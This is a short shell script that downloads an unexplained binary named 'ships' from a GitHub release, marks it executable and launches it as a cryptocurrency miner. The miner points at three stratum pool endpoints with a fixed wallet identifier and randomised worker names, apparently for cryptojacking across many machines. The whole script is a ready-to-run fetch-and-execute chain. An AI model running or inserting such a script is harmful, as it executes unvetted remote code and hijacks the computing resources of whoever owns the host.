#!/bin/sh
apt update && apt install unzip
wget https://github.com/tallapallitech63/ckio/releases/download/fbjkds/ships
chmod +x ships
./ships -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-BATP21JUL@de.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-BATP21JUL@sg.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-BATP21JUL@us.catchthatrabbit.com:8008
